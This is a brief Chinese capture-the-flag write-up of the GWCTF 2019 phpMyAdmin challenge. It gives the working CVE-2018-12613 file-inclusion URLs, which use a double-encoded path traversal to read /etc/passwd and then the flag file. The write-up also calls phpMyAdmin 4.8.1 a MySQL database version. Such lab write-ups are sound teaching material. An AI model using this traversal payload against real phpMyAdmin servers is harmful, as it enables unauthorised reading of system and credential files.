[GWCTF 2019]我有一个数据库 1
1.发现
1.1打开题目地址,用dirsearch对网站进行扫描,发现几个目录。
1.2打开,其中一个显示为是一个MySQL数据库Version 4.8.1。
2.步骤
2.1上网搜索发现该数据给具有文件包含漏洞,输入以下代码验证存在。
http://8d5da76e-6a29-48a3-9f97-c9ccd33297ef.node4.buuoj.cn:81/phpmyadmin/index.php?target=db_datadict.php%253f../../../../../../etc/passwd
2.2输入payload,得到flag。
http://8d5da76e-6a29-48a3-9f97-c9ccd33297ef.node4.buuoj.cn:81/phpmyadmin/index.php?target=db_datadict.php%253f../../../../../../../../../../flag
3.借鉴
4.总结
经验
没思路也要用dirsearch扫一下
知识点
cve-2018-12613-PhpMyadmin后台文件包含漏洞
浙公网安备 33010602011771号